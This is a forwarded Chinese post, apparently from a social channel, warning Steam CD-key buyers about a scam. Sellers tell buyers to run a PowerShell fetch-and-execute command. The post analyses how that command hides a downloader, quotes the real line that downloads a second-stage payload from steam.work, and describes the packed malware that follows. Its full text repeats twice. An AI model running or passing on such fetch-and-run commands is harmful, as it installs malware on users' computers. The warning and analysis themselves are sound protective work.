Forward from: 橘橘橘子汁 & 🍊
# 关于 steam.work 激活码诈骗脚本的分析
结论放在前面:如果买 cdkey 买到让你要输入某个脚本再激活的,那别去管他,立刻退货并举报商家!原因就直接贴我写这个就行...
## 正文
刚刚去买了个 cdkey 准备送给朋友,结果一看发货介绍感觉有点不对劲:【图1】
啥啊,irm iex 这不是经典的从网络获取脚本并执行的操作吗,怎么领个激活码还要搞这?
我一开始还以为是自动安装加速器,商家还怪好的捏,直到我激活不了,把这脚本拉下来看了看:【图2】
好家伙 这玩意整了个极其有欺骗性的东西,因为powershell的多行注释正好是,正好 HTML 文件的开头是 这鸟人给他改成 就变成 powershell 的注释了.. 我都差点没看出来..网页还做了 UA 判断和跳转,真是够阴损
那么真实的代码就只剩一行了
irm steam.work/pwsDwFile/new1 -OutFile x.ps1
又下文件 这回下了个什么玩意出来?【图三有分析】
我怎么兑换个激活码你还给我注入上 Steam了!有病啊!
那么我们便不得不好奇一下注入的文件里到底干了啥呢,我们下下来....
(好吧我根本下不下来 一下下来就被WD干掉了 根本没有分析的机会哇!最后还是把WD关掉了)
随便分析一下
【图4】咋还有个zlib? 在解压什么?
于是动态调试给他 dump 下来,一看这文件头就是 PE 文件...原来是套娃,下载的两个文件里第二个文件就是加密过的真实病毒数据...又把这个解压出来的东西拿去静态分析
然后发现这里面 啥都没有,而且有三个 .text 段,其中两个都是空的,这也太神奇了吧...链接的几个库只有 sqlite3, bcrypt...等等 这莫不是在写 steam 的数据库?
(草 怎么快三点了 该睡觉了 明天再说!~)
相关样本我会发在评论区 想玩的各位可以玩玩看xD
结论放在前面:如果买 cdkey 买到让你要输入某个脚本再激活的,那别去管他,立刻退货并举报商家!原因就直接贴我写这个就行...
## 正文
刚刚去买了个 cdkey 准备送给朋友,结果一看发货介绍感觉有点不对劲:【图1】
啥啊,irm iex 这不是经典的从网络获取脚本并执行的操作吗,怎么领个激活码还要搞这?
我一开始还以为是自动安装加速器,商家还怪好的捏,直到我激活不了,把这脚本拉下来看了看:【图2】
好家伙 这玩意整了个极其有欺骗性的东西,因为powershell的多行注释正好是,正好 HTML 文件的开头是 这鸟人给他改成 就变成 powershell 的注释了.. 我都差点没看出来..网页还做了 UA 判断和跳转,真是够阴损
那么真实的代码就只剩一行了
irm steam.work/pwsDwFile/new1 -OutFile x.ps1
又下文件 这回下了个什么玩意出来?【图三有分析】
我怎么兑换个激活码你还给我注入上 Steam了!有病啊!
那么我们便不得不好奇一下注入的文件里到底干了啥呢,我们下下来....
(好吧我根本下不下来 一下下来就被WD干掉了 根本没有分析的机会哇!最后还是把WD关掉了)
随便分析一下
【图4】咋还有个zlib? 在解压什么?
于是动态调试给他 dump 下来,一看这文件头就是 PE 文件...原来是套娃,下载的两个文件里第二个文件就是加密过的真实病毒数据...又把这个解压出来的东西拿去静态分析
然后发现这里面 啥都没有,而且有三个 .text 段,其中两个都是空的,这也太神奇了吧...链接的几个库只有 sqlite3, bcrypt...等等 这莫不是在写 steam 的数据库?
(草 怎么快三点了 该睡觉了 明天再说!~)
相关样本我会发在评论区 想玩的各位可以玩玩看xD